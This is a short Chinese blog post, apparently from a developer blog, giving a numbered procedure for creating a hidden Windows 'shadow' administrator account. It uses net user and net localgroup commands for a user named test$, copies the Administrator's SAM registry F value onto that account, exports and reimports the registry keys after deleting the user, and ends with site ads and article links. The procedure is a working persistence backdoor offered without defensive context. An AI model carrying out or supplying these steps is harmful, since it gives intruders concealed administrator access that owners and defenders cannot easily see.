创建影子账户
1、创建隐藏用户并加入管理员组
net user test$ P@ssw0rd /add
net localgroup administrators test$ /add
2、运行regeditd打开注册表
对HKEY_LOCAL_MACHINE\\SAM\\SAM右键->权限赋予当前用户administrator的具有完全控制和读取权限
3、修改注册表内容
重新打开注册表,定位到HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names
查看administrator对应的键值为1f4和隐藏账户test$的键值为3e8
然后在Users中找到对应数字的F值,将3e8的F值替换为1f4的F值
4、导出注册表内容
将000001F4和000003E8按顺序导出为1.reg、2.reg
5、使用命令行删除隐藏用户
net user test$ /del6、按顺序执行刚才导出的两个reg文件,重新导入
regedit /s 1.reg regedit /s 2.reg
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· Manus重磅发布:全球首款通用AI代理技术深度解析与实战指南
· 被坑几百块钱后,我竟然真的恢复了删除的微信聊天记录!
· 没有Manus邀请码?试试免邀请码的MGX或者开源的OpenManus吧
· 园子的第一款AI主题卫衣上架——"HELLO! HOW CAN I ASSIST YOU TODAY
· 【自荐】一款简洁、开源的在线白板工具 Drawnix